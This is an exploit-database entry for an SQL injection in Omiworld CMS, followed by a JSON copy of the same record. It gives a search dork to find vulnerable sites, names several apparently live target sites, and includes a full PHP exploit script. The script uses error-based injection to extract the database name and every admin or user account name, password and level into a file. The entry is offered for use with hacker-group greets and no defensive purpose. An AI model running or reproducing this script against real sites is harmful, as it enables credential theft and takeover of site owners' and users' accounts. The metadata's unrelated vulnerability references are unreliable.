ID 1337DAY-ID-18013
Type zdt
Reporter The UnKnØwN
Modified 2012-04-09T00:00:00
Description
Exploit for php platform in category web applications
====================== Vulnerability info ====================
[+] Exploit Title : Omiworld CMS - SQL Injection Vulnerability
[+] Date : 09-04-2012
[+] Author : The UnKnØwN
[+] Software Link : http://www.mediafire.com/?ixfs79gw2clicrx
[+] Version : 3
[+] Category : Webapps
[+] Google Dork : intext:Certaines images sont la propriétés de Ankama Games , omiworld
[+] Tested on : Windows xp
[+] Demo site : - http://ouragan-games.redheberg.com/ouragan//index.php?pages=home
- http://beta-house.fr/index.php?pages=home
- http://opium.exano.net/index.php?pages=home
============================ Greets ==========================
Greets to : Soka - Hony - CouldFire - kimgx12 - w0dm4n - The Crazy3D Team
and all Algerian h4x0rs
www.izzi-hack.com - www.dofus-exploit.com
===================== Vulnerability details ==================
there is an unprotected post in vip_validation.php
$personnage = $_POST['perso'];
$sql = "SELECT * FROM personnages WHERE guid = $personnage";
=========================== Exploit ==========================
page : http://site/path/index.php?pages=vip_validation
post data : send=Envoyer&perso={inject}
There is also an exploit coded in php for Black Hole Reactør (http://www.mediafire.com/?ij9rfpfw6s7uzxf for windows only)
load exploits/webapp/omiworld_injection.php
set HOST target
set MODE (1 for admin accounts/2 for all accounts)
set FILE (save format TXT/SQL)
exploit
============================= END =============================
<?php
//NOTE : If you are using BHR put this file in \exploits\webapp folder
/*
!Omiworld_Injection
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Injection mode
@ FILE = sql = Save type
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host,$port, $packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
function write_txt($host, $file, $account, $pass, $level)
{
$save_file = fopen("".$file."", "a+");
fwrite($save_file, "$account:$pass:$level\n");
fclose($save_file);
}
function write_sql($file, $account, $pass, $level)
{
$save_file = fopen("".$file."", "a+");
fwrite($save_file, "INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level')\n");
fclose($save_file);
}
function write($host, $file)
{
$save_file = fopen("".$file."", "a+");
if($file == "accounts.sql")
fwrite($save_file, "/* Accounts of $host */\n");
else
fwrite($save_file, "=========== Accounts of $host ===========\n");
fclose($save_file);
}
function fetch_data($page)
{
$debut = "~'";
$debutTxt = strpos( $page, $debut ) + strlen( $debut );
$fin = "'~1";
$finTxt = strpos( $page, $fin );
$data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt );
return $data_fetch;
}
function PostIt($host,$port,$path,$payload){
$packet = "POST {$path}index.php?pages=vip_validation HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";
return http_send($host,$port, $packet);
}
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| OmiWorld CMS SQL Injection Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <port> <path> <mode> <save>\n";
print "\nExample....: php $argv[0] localhost 80 / 1 txt ";
print "\nExample....: php $argv[0] localhost 80 /site/ 3 sql \n";
die();
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];
$file = $argv[5];
if($file == "txt") $file = "accounts.txt";
else $file = "accounts.sql";
$inj_test = "or '1'='1";
$inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_test."";
if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable\n");
else print ("[+] CMS can be exploited!\n");
$payload = "send=Envoyer&perso=test".$inj_db."";
$db = fetch_data(PostIt($host,$port,$path,$payload));
if(empty($db)) die("[-] Can't found the database!\n");
print "[+] Database: ".$db."\n";
switch ($mode)
{
case 1:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Admin accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));
list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";
if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
case 2:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));
list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";
if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
}
# 0day.today [2018-03-19] #
{"published": "2012-04-09T00:00:00", "id": "1337DAY-ID-18013", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2018-03-19T21:13:22", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["DEBIAN_DSA-4100.NASL", "UBUNTU_USN-3606-1.NASL", "AL2_ALAS-2019-1327.NASL", "NEWSTART_CGSL_NS-SA-2019-0185_LIBTIFF.NASL", "ALA_ALAS-2019-1306.NASL", "UBUNTU_USN-3602-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843483", "OPENVAS:1361412562310704100", "OPENVAS:1361412562310875292", "OPENVAS:1361412562310875294", "OPENVAS:1361412562310812582"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:419C347150598833F1C493E269FE4871", "CFOUNDRY:B5964D2AB72D599E586D491432260541"]}, {"type": "ubuntu", "idList": ["USN-3602-1", "USN-3606-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4100-1:12A86"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8162", "SECURITYVULNS:DOC:18013"]}], "modified": "2018-03-19T21:13:22", "rev": 2}, "vulnersScore": 2.6}, "type": "zdt", "lastseen": "2018-03-19T21:13:22", "edition": 2, "title": "Omiworld CMS - SQL Injection Vulnerability", "href": "https://0day.today/exploit/description/18013", "modified": "2012-04-09T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/18013", "references": [], "reporter": "The UnKn\u00d8wN", "sourceData": "====================== Vulnerability info ====================\r\n[+] Exploit Title : Omiworld CMS - SQL Injection Vulnerability\r\n[+] Date : 09-04-2012\r\n[+] Author : The UnKn\u00d8wN\r\n[+] Software Link : http://www.mediafire.com/?ixfs79gw2clicrx\r\n[+] Version : 3\r\n[+] Category : Webapps\r\n[+] Google Dork : intext:Certaines images sont la propri\u00e9t\u00e9s de Ankama Games , omiworld\r\n[+] Tested on : Windows xp\r\n[+] Demo site : - http://ouragan-games.redheberg.com/ouragan//index.php?pages=home\r\n - http://beta-house.fr/index.php?pages=home\r\n - http://opium.exano.net/index.php?pages=home\r\n============================ Greets ========================== \r\nGreets to : Soka - Hony - CouldFire - kimgx12 - w0dm4n - The Crazy3D Team \r\n and all Algerian h4x0rs\r\n www.izzi-hack.com - www.dofus-exploit.com\r\n===================== Vulnerability details ================== \r\nthere is an unprotected post in vip_validation.php\r\n $personnage = $_POST['perso'];\r\n$sql = \"SELECT * FROM personnages WHERE guid = $personnage\";\r\n=========================== Exploit ==========================\r\npage : http://site/path/index.php?pages=vip_validation\r\npost data : send=Envoyer&perso={inject}\r\n\r\nThere is also an exploit coded in php for Black Hole React\u00f8r (http://www.mediafire.com/?ij9rfpfw6s7uzxf for windows only)\r\n\r\nload exploits/webapp/omiworld_injection.php\r\nset HOST target\r\nset MODE (1 for admin accounts/2 for all accounts)\r\nset FILE (save format TXT/SQL)\r\nexploit\r\n============================= END =============================\r\n\r\n<?php\r\n//NOTE : If you are using BHR put this file in \\exploits\\webapp folder\r\n/*\r\n!Omiworld_Injection\r\n@ HOST = localhost = Target URL\r\n@ PORT = 80 = Target Port\r\n@ PATH = / = Web site path\r\n@ MODE = 1 = Injection mode\r\n@ FILE = sql = Save type\r\n*/\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host,$port, $packet)\r\n{\r\n if (!($sock = fsockopen($host, $port)))\r\n die(\"\\n[-] No response from {$host}:{$port}\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\nfunction write_txt($host, $file, $account, $pass, $level)\r\n{\r\n\t$save_file = fopen(\"\".$file.\"\", \"a+\"); \r\n\tfwrite($save_file, \"$account:$pass:$level\\n\");\r\n\tfclose($save_file);\r\n}\r\nfunction write_sql($file, $account, $pass, $level)\r\n{\r\n\t$save_file = fopen(\"\".$file.\"\", \"a+\");\r\n\tfwrite($save_file, \"INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level')\\n\");\r\n\tfclose($save_file);\r\n}\r\nfunction write($host, $file)\r\n{\r\n\t$save_file = fopen(\"\".$file.\"\", \"a+\");\r\n\tif($file == \"accounts.sql\")\r\n\t\tfwrite($save_file, \"/* Accounts of $host */\\n\");\r\n\telse\r\n\t\tfwrite($save_file, \"=========== Accounts of $host ===========\\n\");\r\n\tfclose($save_file);\r\n}\r\nfunction fetch_data($page)\r\n{\r\n\t$debut = \"~'\";\r\n\t$debutTxt = strpos( $page, $debut ) + strlen( $debut ); \r\n\t$fin = \"'~1\";\r\n\t$finTxt = strpos( $page, $fin ); \r\n\t$data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt ); \r\n\treturn $data_fetch;\r\n}\r\nfunction PostIt($host,$port,$path,$payload){\r\n$packet = \"POST {$path}index.php?pages=vip_validation HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Connection: keep-alive\\r\\n\\r\\n{$payload}\";\r\nreturn http_send($host,$port, $packet);\r\n}\r\nprint \"\\n+-----------------------[ The Crazy3D Team ]--------------------------+\";\r\nprint \"\\n| OmiWorld CMS SQL Injection Exploit |\";\r\nprint \"\\n| by The UnKn0wN |\";\r\nprint \"\\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |\";\r\nprint \"\\n+---------------------------------------------------------------------+\";\r\nprint \"\\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |\";\r\nprint \"\\n+---------------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 5)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <port> <path> <mode> <save>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost 80 / 1 txt \";\r\n print \"\\nExample....: php $argv[0] localhost 80 /site/ 3 sql \\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$port = $argv[2];\r\n$path = $argv[3];\r\n$mode = $argv[4];\r\n$file = $argv[5];\r\n\r\nif($file == \"txt\") $file = \"accounts.txt\";\r\nelse $file = \"accounts.sql\";\r\n$inj_test = \"or '1'='1\";\r\n$inj_db = \" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\r\n$payload = \"send=Envoyer&perso=test\".$inj_test.\"\";\r\n\r\nif(!(preg_match(\"#Erreur SQL#\", postit($host,$port, $path,$payload)))) die (\"[-] CMS not vulnerable\\n\");\r\nelse print (\"[+] CMS can be exploited!\\n\");\r\n$payload = \"send=Envoyer&perso=test\".$inj_db.\"\";\r\n$db = fetch_data(PostIt($host,$port,$path,$payload));\r\nif(empty($db)) die(\"[-] Can't found the database!\\n\");\r\nprint \"[+] Database: \".$db.\"\\n\";\r\nswitch ($mode)\r\n{\r\ncase 1:\r\n$inj_count_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `\".$db.\"`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\r\n$payload = \"send=Envoyer&perso=test\".$inj_count_accounts.\"\";\r\n$num = fetch_data(PostIt($host,$port,$path,$payload));\r\nprint \"[+] Admin accounts: \".$num.\"\\n\";\r\nfor($i=0; $i<$num; $i++)\r\n{\r\n$inj_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\t\r\n$payload = \"send=Envoyer&perso=test\".$inj_accounts.\"\";\r\n$data = fetch_data(PostIt($host,$port,$path,$payload));\r\n\r\nlist($account, $pass, $level) = split('[/.-]', $data);\r\nprint \"Account: {$account}\\t Pass: {$pass}\\t Level: {$level}\\n\";\r\n\t\r\nif($file == \"accounts.txt\") \r\nwrite_txt($file, $account, $pass, $level);\t\t\t\r\nelse \r\nwrite_sql($file, $account, $pass, $level);\r\n}\r\nbreak;\r\ncase 2:\r\n$inj_count_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `\".$db.\"`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\r\n$payload = \"send=Envoyer&perso=test\".$inj_count_accounts.\"\";\r\n$num = fetch_data(PostIt($host,$port,$path,$payload));\r\nprint \"[+] Accounts: \".$num.\"\\n\";\r\nfor($i=0; $i<$num; $i++)\r\n{\r\n$inj_accounts = \" and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";\t\r\n$payload = \"send=Envoyer&perso=test\".$inj_accounts.\"\";\r\n$data = fetch_data(PostIt($host,$port,$path,$payload));\r\n\r\nlist($account, $pass, $level) = split('[/.-]', $data);\r\nprint \"Account: {$account}\\t Pass: {$pass}\\t Level: {$level}\\n\";\r\n\t\r\nif($file == \"accounts.txt\") \r\nwrite_txt($file, $account, $pass, $level);\t\t\t\r\nelse \r\nwrite_sql($file, $account, $pass, $level);\r\n}\r\nbreak; \r\n}\r\n\r\n\n\n# 0day.today [2018-03-19] #"}
{}
